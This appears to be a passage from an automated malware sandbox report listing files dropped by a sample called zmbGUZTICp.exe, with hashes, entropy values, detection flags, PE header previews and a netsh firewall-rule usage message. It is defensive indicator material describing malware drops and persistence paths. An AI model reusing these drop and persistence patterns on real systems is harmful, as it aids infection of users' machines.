                                                                                                                                                    SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1D34.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):905216
                                                                                                                                                    Entropy (8bit):7.399713113456654
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                    MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                    SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                    SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                    SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\1E7F.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):301056
                                                                                                                                                    Entropy (8bit):5.192330972647351
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:4/ls8LAAkcooHqeUolNx8IA0ZU3D80T840yWrxpzbgqruJnfed:Ils8LA/oHbbLAGOfT8auzbgwuJG
                                                                                                                                                    MD5:277680BD3182EB0940BC356FF4712BEF
                                                                                                                                                    SHA1:5995AE9D0247036CC6D3EA741E7504C913F1FB76
                                                                                                                                                    SHA-256:F9F0AAF36F064CDFC25A12663FFA348EB6D923A153F08C7CA9052DCB184B3570
                                                                                                                                                    SHA-512:0B777D45C50EAE00AD050D3B2A78FA60EB78FE837696A6562007ED628719784655BA13EDCBBEE953F7EEFADE49599EE6D3D23E1C585114D7AECDDDA9AD1D0ECB
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2t..v.i.v.i.v.i.hG..i.i.hG....i.hG..[.i.Q...q.i.v.h...i.hG..w.i.hG..w.i.hG..w.i.Richv.i.........PE..L.....b_.............................-.......0....@.......................... ...............................................e..P....................................2.............................. Y..@............0...............................text............................... ..`.rdata..D?...0...@..."..............@..@.data...X....p...$...b..............@....rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\239.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3576320
                                                                                                                                                    Entropy (8bit):7.9976863291960605
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                                                    MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                                                    SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                                                    SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                                                    SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2D04.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:MS-DOS executable
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):557664
                                                                                                                                                    Entropy (8bit):7.687250283474463
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:fWxcQhhhhhn8bieAtJlllLtrHWnjkQrK8iBHZkshvesxViA9Og+:fWZhhhhhUATlLtrUbK8oZphveoMA9
                                                                                                                                                    MD5:6ADB5470086099B9169109333FADAB86
                                                                                                                                                    SHA1:87EB7A01E9E54E0A308F8D5EDFD3AF6EBA4DC619
                                                                                                                                                    SHA-256:B4298F77E454BD5F0BD58913F95CE2D2AF8653F3253E22D944B20758BBC944B4
                                                                                                                                                    SHA-512:D050466BE53C33DAAF1E30CD50D7205F50C1ACA7BA13160B565CF79E1466A85F307FE1EC05DD09F59407FCB74E3375E8EE706ACDA6906E52DE6F2DD5FA3EDDCD
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ.....o...g.'.:.(3...32.....f.....C'B{b.........+..R...d:.....Q..............................................................................................................................................................................................PE..L....5...............0..$...*........... ...`....@..........................0.......@....@..................................p..........P)...........................................................................................................idata...`.............................`.pdata.......p......................@....rsrc...P)......0...................@..@.didata..........x..................@.....................................................................................................................................................................................................................................................................................................................g..L.r9..v9.<iP.hL[Kc...",..
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\2DB3.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):322560
                                                                                                                                                    Entropy (8bit):6.7095586688781985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:nOOJ91Tu9Vc1ye3MKfa+zqKnvDfsxa6hkZC15O5Pdz:nRJ91TYWym1ffzvD36YC15E
                                                                                                                                                    MD5:6009BCB680BE6C0F656AA157E56423DC
                                                                                                                                                    SHA1:FA9BA68D6B2026683BD392259BA26D7D468AEA7E
                                                                                                                                                    SHA-256:5C037C7C1338CF54A9D1E81B74BB4AD003E1A254069A03499426EC1600A748D9
                                                                                                                                                    SHA-512:5ECE7D9531051C951DFA0CF9533AB778B468EBE3EBE5D7B8A934D408E69BE910F244C59810A5FB41376B1CA7E5EB78DBF514032354EF047D00F043E2A17795E9
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...9.-`..........................................@.........................................................................$...(...................................................................0...@...............D............................text............................... ..`.data...............................@....gave...............................@....noduf..............................@....gafal..............................@....rsrc................ ..............@..@.reloc..dF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\309C.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):320512
                                                                                                                                                    Entropy (8bit):6.693203776268283
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:ea1ijIN+Aee6+saxCBxHoM3sDKOd4xncb3wQ:eag8N+Ae2sTvIM5OYncb
                                                                                                                                                    MD5:8B25D9317E18654C3F83EF8630D1DE16
                                                                                                                                                    SHA1:B4503FB92DCB9B4B90E2CD2A534AE38C08F0589A
                                                                                                                                                    SHA-256:1BE428F924402D7CC4586CA37A9E843C869B394F85085DB5E4E85D150AA87E04
                                                                                                                                                    SHA-512:36AD3AD9E9DF0D52DEB4F350880BAEFA3F6871945D566118573AD1511F9CCDE55A5EC205AADCB7ACA156AAFC881587551996BBE27A47B27F8BD596CBCE04E97B
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...5._............................ .............@.........................................................................D...(...................................................................0...@...............D............................text............................... ..`.data...............................@....nife...............................@....kiza...............................@....lagoti.............................@....rsrc...............................@..@.reloc..ZF.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\3F71.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                    Category:modified
                                                                                                                                                    Size (bytes):537088
                                                                                                                                                    Entropy (8bit):5.840438491186833
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:SV2DJxKmQESnLJYydpKDDCrqXSIXcZD0sgbxRo:nK1vVYcZyXSY
                                                                                                                                                    MD5:D7DF01D8158BFADDC8BA48390E52F355
                                                                                                                                                    SHA1:7B885368AA9459CE6E88D70F48C2225352FAB6EF
                                                                                                                                                    SHA-256:4F4D1A2479BA99627B5C2BC648D91F412A7DDDDF4BCA9688C67685C5A8A7078E
                                                                                                                                                    SHA-512:63F1C903FB868E25CE49D070F02345E1884F06EDEC20C9F8A47158ECB70B9E93AAD47C279A423DB1189C06044EA261446CAE4DB3975075759052D264B020262A
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?y*...............0..*...........I... ...`....@.. ....................................@.................................`I..K....`............................................................................... ............... ..H............text....)... ...*.................. ..`.rsrc........`.......,..............@....reloc...............0..............@..B.................I......H............?..........hX..}............................................(....*..0..,.......(d...8....*.~....u....s....z&8.........8........................*.......*....(d...(....*...j*.......*.......*.......*.......*....(....*.~(....(^...8....*(.........8........*.......*.......*.......*.......*....0.............*.0.............*....*.......*.......*....(....*..0.............*....*....0.............*.(....z.A.........z.A.......................*.......*.......*.......*.......
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\A7F0.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):905216
                                                                                                                                                    Entropy (8bit):7.399713113456654
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                                                                                    MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                                                                                    SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                                                                                    SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                                                                                    SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................g.....q.I....v....h......E....x.....f.....c...Rich..................PE..L....[._................. ...2.......0.......0....@..........................P|......q......................................Xf..(....p.. ............................1..............................@Y..@............0...............................text............ .................. ..`.rdata.."?...0...@...$..............@..@.data...8....p.......d..............@....rsrc... .n..p......................@..@........................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BC16.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):373760
                                                                                                                                                    Entropy (8bit):6.990411328206368
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:GszrgLWpo6b1OmohXrIdF5SpBLE4Hy+74YOAnF3YFUGFHWEZq:Gsgq3b1Omsb7pBLEazsYOSGFHFHW
                                                                                                                                                    MD5:8B239554FE346656C8EEF9484CE8092F
                                                                                                                                                    SHA1:D6A96BE7A61328D7C25D7585807213DD24E0694C
                                                                                                                                                    SHA-256:F96FB1160AAAA0B073EF0CDB061C85C7FAF4EFE018B18BE19D21228C7455E489
                                                                                                                                                    SHA-512:CE9945E2AF46CCD94C99C36360E594FF5048FE8E146210CF8BA0D71C34CC3382B0AA252A96646BBFD57A22E7A72E9B917E457B176BCA2B12CC4F662D8430427D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..U(...(...(...6.).1...6.?.W....l..+...(.......6.8.....6.(.)...6.-.)...Rich(...........PE..L...a.R`.....................v......@.............@..................................&..........................................(........{...................0..........................................@...............8............................text............................... ..`.data...............................@....gizi...............................@....bur................................@....wob................................@....rsrc....{.......|..................@..@.reloc..4F...0...H...l..............@..B................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\D452.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3576320
                                                                                                                                                    Entropy (8bit):7.9976863291960605
                                                                                                                                                    Encrypted:true
                                                                                                                                                    SSDEEP:49152:Y+RSFqeQKgdJee+ntOkgd+TuRCg+687ZEYNFvKfDIcK8nAONaGGh:Yb8eQKg+tOV0T0z875NFKfDPK8nASA
                                                                                                                                                    MD5:5800952B83AECEFC3AA06CCB5B29A4C2
                                                                                                                                                    SHA1:DB51DDBDF8B5B1ABECD6CFAB36514985F357F7A8
                                                                                                                                                    SHA-256:B8BED0211974F32DB2C385350FB62954F0B0F335BC592B51144027956524D674
                                                                                                                                                    SHA-512:2A490708A2C5B742CEB14DE6E2180C4CB606FCCEB5F17DE69249CF532EDC37B984686B534A88AE861CC38471C5892785C26DA68C4F662959542458C583E77E38
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.................$...................@....@...........................S......!7.....................................|.N. .... M...................................................................................................................... ..........................@................0......................@................@...z..................@............ ...0......................@...........x+...P......................@.............1.........................@....rsrc........ M......L0.............@....28gybOo......N.......1.............@....adata.......pS.......6.............@...........................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\tejjnepq.exe
                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\309C.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):15600640
                                                                                                                                                    Entropy (8bit):3.7768495924879493
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:xa1ijIN+Aee6+saxCBxHoM3sDKOd4xncb3wQ:xag8N+Ae2sTvIM5OYncb
                                                                                                                                                    MD5:310337FA2432C256984AA89486B74D95
                                                                                                                                                    SHA1:A5234B3EA059F3A553C55D262BC2B7CB347ED12E
                                                                                                                                                    SHA-256:966557B6F228EDA641E155A858F574654E431743311D83E4841013D63044A994
                                                                                                                                                    SHA-512:8E9F3F6404445BAE167845B77D173AA8FF982DFD7EB998FD33FFD57AC92FB111B4FEAB934A7A961349A00D7D0B925CD3451C814779E33E8FE9454BFED92C6710
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...5._............................ .............@.........................................................................D...(...................................................................0...@...............D............................text............................... ..`.data...............................@....nife...............................@....kiza...............................@....lagoti.............................@....rsrc...............................@..@.reloc..ZF.......p..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\gdrgbdj
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):319488
                                                                                                                                                    Entropy (8bit):6.6822544763975475
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:dTIJAM3EC/eddUaHyF9mqcMuS9W1uPVeHcENjQe:dY3EIWU9/pcO9rPVeqe
                                                                                                                                                    MD5:9AF4D2022DC05C2DBBC4D218A8F0974C
                                                                                                                                                    SHA1:F87C7511D2C4EA4894603D3CFDDD478C8C2B3EAD
                                                                                                                                                    SHA-256:C8FE81088B2CAA9DF35D92A588FB266A145C95B81B5C66D5BFE181FA73B17D82
                                                                                                                                                    SHA-512:71230365C1E7ACB2B8740434322A1F8AA87D417EADBB6D8D7FB1B2BF9ECB1247BFEC2B2568812F22D61F125B3F4F739989121B5E17C63CCD580D8E8B059C63C0
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L.....-`.........................................@.............................................................................(...................................................................0...@...............D............................text...t........................... ..`.data...............................@....zug................................@....nafuti.............................@....karom..............................@....rsrc...............................@..@.reloc...F.......H..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\gdrgbdj:Zone.Identifier
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):26
                                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                                    C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                                                    Process:C:\Windows\System32\svchost.exe
                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55
                                                                                                                                                    Entropy (8bit):4.306461250274409
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                    MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                    SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                    SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                    SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                    C:\Windows\SysWOW64\ozuqupbe\tejjnepq.exe (copy)
                                                                                                                                                    Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):15600640
                                                                                                                                                    Entropy (8bit):3.7768495924879493
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:xa1ijIN+Aee6+saxCBxHoM3sDKOd4xncb3wQ:xag8N+Ae2sTvIM5OYncb
                                                                                                                                                    MD5:310337FA2432C256984AA89486B74D95
                                                                                                                                                    SHA1:A5234B3EA059F3A553C55D262BC2B7CB347ED12E
                                                                                                                                                    SHA-256:966557B6F228EDA641E155A858F574654E431743311D83E4841013D63044A994
                                                                                                                                                    SHA-512:8E9F3F6404445BAE167845B77D173AA8FF982DFD7EB998FD33FFD57AC92FB111B4FEAB934A7A961349A00D7D0B925CD3451C814779E33E8FE9454BFED92C6710
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<..R..R..R......R....g.R..])..R..S...R.....R......R......R.Rich.R.................PE..L...5._............................ .............@.........................................................................D...(...................................................................0...@...............D............................text............................... ..`.data...............................@....nife...............................@....kiza...............................@....lagoti.............................@....rsrc...............................@..@.reloc..ZF.......p..................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1572864
                                                                                                                                                    Entropy (8bit):4.2133338797531135
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12288:mxKBe46xNAzd/V0PjNF8ULoAGvE+dAHmdCAsKruqm03eS/SXjZoznH:AKBe46xNAzZV0PsZVrf3
                                                                                                                                                    MD5:14806013B9BD43BA646F753EAFF9B390
                                                                                                                                                    SHA1:1075C9847B578FB5C4AC7E5D353C7CA37D9EB28F
                                                                                                                                                    SHA-256:3DFE3035D3C3273B157B5B4AC66EAD61262F684B5C6ADE9AC0A88B6EE432BBE7
                                                                                                                                                    SHA-512:2696AAB6EBADF79A9999B8E1EA97DCAB7352F7DC4236AD07EC5FF8D9BFBD37F344EFA3B0F2977DDCCD277BE33E83248F83B6290E3C19D831EE751054B3BE0BCC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: regfV...V...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm>.L.v................................................................................................................................................................................................................................................................................................................................................)G.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                                                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20480
                                                                                                                                                    Entropy (8bit):3.458017950724434
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:v5gC5BhIpnc8aTVgGpKLXZmnnBpx9787W0:a8nSc8AVgGYLXEnnBJ87W
                                                                                                                                                    MD5:1E22C2B14F4E95B9E20BCC6DC83DA762
                                                                                                                                                    SHA1:14496E143D23B42C0D5C2DE1B9D0F0495607443B
                                                                                                                                                    SHA-256:6D7DCA21B04F335CA0A1C3ABE8C0F14736D1CB2BA0AB22602F395B64E90B3A76
                                                                                                                                                    SHA-512:8106412CC3BA60DD5EA0CE230AB2FE504D74CB7F7AF93B3CF79B312CCFC873DCEB09918806FD98727C76B7FAD813B2331289DC61826FD9A50757D69E3D5ADC89
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: regfU...U...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm>.L.v................................................................................................................................................................................................................................................................................................................................................)G.HvLE.N......U...........&X}$...`..4w-oB..................`... ..hbin................p.\..,..........nk,.w%O.v................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk .w%O.v....... ........................... .......Z.......................Root........lf......Root....nk .w%O.v....................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck.......p...
                                                                                                                                                    \Device\ConDrv
                                                                                                                                                    Process:C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3773
                                                                                                                                                    Entropy (8bit):4.7109073551842435
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:VHILZNfrI7WFY32iIiNOmV/HToZV9It199hiALlIg39bWA1RvTBi/g2eB:VoLr0y9iIiNOoHTou7bhBlIydWALLt2w
                                                                                                                                                    MD5:DA3247A302D70819F10BCEEBAF400503
                                                                                                                                                    SHA1:2857AA198EE76C86FC929CC3388A56D5FD051844
                                                                                                                                                    SHA-256:5262E1EE394F329CD1F87EA31BA4A396C4A76EDC3A87612A179F81F21606ABC8
                                                                                                                                                    SHA-512:48FFEC059B4E88F21C2AA4049B7D9E303C0C93D1AD771E405827149EDDF986A72EF49C0F6D8B70F5839DCDBD6B1EA8125C8B300134B7F71C47702B577AD090F8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:unknown
                                                                                                                                                    Preview: ..A specified value is not valid.....Usage: add rule name=<string>.. dir=in|out.. action=allow|block|bypass.. [program=<program path>].. [service=<service short name>|any].. [description=<string>].. [enable=yes|no (default=yes)].. [profile=public|private|domain|any[,...]].. [localip=any|<IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [remoteip=any|localsubnet|dns|dhcp|wins|defaultgateway|.. <IPv4 address>|<IPv6 address>|<subnet>|<range>|<list>].. [localport=0-65535|<port range>[,...]|RPC|RPC-EPMap|IPHTTPS|any (default=any)].. [remoteport=0-65535|<port range>[,...]|any (default=any)].. [protocol=0-255|icmpv4|icmpv6|icmpv4:type,code|icmpv6:type,code|.. tcp|udp|any (default=any)].. [interfacetype=wireless|lan|ras|any].. [rmtcomputergrp=<SDDL string>].. [rmtusrgrp=<SDDL string>].. [edge=yes|deferapp|deferuser|no (default=no)].. [security=authenticate|authenc|authdynenc|authnoencap|

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):6.6822544763975475
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.83%
                                                                                                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:zmbGUZTICp.exe
                                                                                                                                                    File size:319488
                                                                                                                                                    MD5:9af4d2022dc05c2dbbc4d218a8f0974c
